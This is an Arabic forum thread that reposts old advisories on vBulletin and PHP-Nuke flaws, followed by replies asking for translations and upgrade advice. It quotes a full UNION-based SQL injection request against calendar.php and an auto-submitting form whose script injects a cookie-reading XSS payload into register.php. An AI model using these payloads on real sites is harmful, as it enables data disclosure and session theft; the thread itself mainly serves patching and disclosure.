شرح بعض الثغرات الطازجه و كيفية معلجتها

[REDSTAING]

شرح بعض الثغرات الطازجه و كيفية معلجتها



vBulletin Forum 2.3.xx calendar.php SQL Injection
========================================================
Description:
=============
There exist a sql injection problem in calendar.php. Notice the eventid
field.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

Exploit request
================
calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate

(14 is the eventid of your added event)

The subject and event field will show the result.

The query_first function will only return the first row of the query result,
so make sure it returns the
one you want.

The Fix?
============
filter eventid before query.



=====================================
2

vBulletin Calendar Script SQL Injection Vulnerability

http://www.example.com/[software_installation_path]/calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate

(it should be noted that the underlying database must support the UNION command for this example to work)


دانغاو :funny:

[REDSTAING]

vBulletin 2.3.4

vBulletin 2.3.4 is a security and bug fix release. We recommend you upgrade as soon as possible; if this is not possible, you can simply use the updated calendar.php from this version to obtain the security fix.

The bugs fixed include:
Problem adding users to buddy/ignore list. (Link)
COPPA profiles visible (Link)
Post titles contain HTML characters when "report bad post" emails (Link)
Security fix in calendar.php
Backing up forums
Please be sure to check your backups, that they are complete before continuing with an upgrade. We had reports that PHP was causing time out errors when creating the back up SQL, and this was causing for incomplete or corrupted backups. The safest way to do a backup is to use the mysqldump utility through telnet, as it will not suffer from any such problems.

Installation / Upgrade Instructions
These are available in the Members Area.

Template Changes
There have been no template changes since 2.3.3.

Files Changes (from 2.3.3)
Main Directory: calendar.php, member.php, member2.php, report.php
Admin Directory: bbimport.php, functions.php, index.php
Mod Directory: none
The usuals (for version numbers): admin/global.php, admin/install.php, admin/upgrade1.php
__________________

[REDSTAING]

ثغرة بمجلد
Problems found in Survey module.



Survey module.

| Product: PHP-Nuke |
| Version: 7.0 FINAL (and olders) |
| Vulnerability: sql-injection


http://www.swalif.net/softs/showthre...threadid=65414 |

[REDSTAING]

vulnerable VBulletin VBulletin 3.0 beta 2

not vulnerable VBulletin VBulletin 2.2.8
VBulletin VBulletin 2.3 .0


The following example has been provided:

[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

*Replace ([],<>)

[clever]

مشكور اخوي وجزاك الله الف خير

[مراقب1]

جزاك الله كل الخير

[azazi]

اخوي واستاذي العزيز REDSTAING

ممكن تشرح لنا كيف حل الثغرات بالعربي .. الانه فيه ناس ماتعرف انجليزي


انا نسختي 2.3.2

[Ziad]

يعطيك العافية

[MOHAND]

حبيبي REDSTAING يا ريت تشرحلنا بالعربي كيف نحل مشكلة 2.3.3 و2.3.4 لاني ناوي ارقي المنتدى حقي على وحده منهم واكون شاكر لك حبيبي .

تقبل تحياتي ....

[البرق1]

أغلبنا أموره وسط بالانجليزي فيستحسن الله يرضى عليك تترجم لنا
كيف نعمل و نقفل الثغرة ..
وشكرا لك .

[خالد]

حبيبي انا مييييييييح في الانجليزي يعني صفحه بيضاء

فياليت أحد يتكرم ويترجم لنا الثغرات والحل والله يجزاه الف خير

[REDSTAING]

رد مقتبس من MOHAND
حبيبي REDSTAING يا ريت تشرحلنا بالعربي كيف نحل مشكلة 2.3.3 و2.3.4 لاني ناوي ارقي المنتدى حقي على وحده منهم واكون شاكر لك حبيبي .

تقبل تحياتي ....

هلا اخوي لو نسختك 2.3.3 رقيها الي 2.3.4
لايوجد تحديثات جوهرية في نسخة 2.3.4 الااصلاح بعض الملفات وسد ثغرتين
Template Changes
There have been no template changes since 2.3.3.

Files Changes (from 2.3.3)
Main Directory: calendar.php, member.php, member2.php, report.php
Admin Directory: bbimport.php, functions.php, index.php
Mod Directory: none
The usuals (for version numbers): admin/global.php, admin/install.php, admin/upgrade1.php
===================================

عن نسخة 2.3.4

The bugs fixed include:
Problem adding users to buddy/ignore list. (Link)
COPPA profiles visible (Link)
Post titles contain HTML characters when "report bad post" emails (Link)
Security fix in calendar.php


ولو منتداك نسخة 2.3.4 قم بتبديل ملف التقويم بالذي ارفقته وتمام
اي تطورات راح اطرحها هنا مستقبلا


كيفية استغلال الثغرة مو شغلي
تحياتي

[Rawi]

انا مييييييييييييييييييييييييييييييييييييييييييييييييي ييح
تعرف كيف ميييييييييييييييييييييييييييييح في الانجليزي

يعني مدري وش سالفه الموضوع

[REDSTAING]

رد مقتبس من Rawi
انا مييييييييييييييييييييييييييييييييييييييييييييييييي ييح
تعرف كيف ميييييييييييييييييييييييييييييح في الانجليزي

يعني مدري وش سالفه الموضوع

حبيبيب قلبي منتداك نسختها
Powered by: vBulletin Version 2.2.8 حدي عايش عليه غيراك
ههههه

رقيها لنسخه الجديد احسن لك فهمتني ليش تراك بينزلول كل يومين نسخه بسبببب
1 ثغرات
2 اخطاء برمجية

فهمتني:anger2:

[9arab.com]

طيب ونسخه الــ 2.3.0 على ماعتقد خاليه من الثغرات ولا لا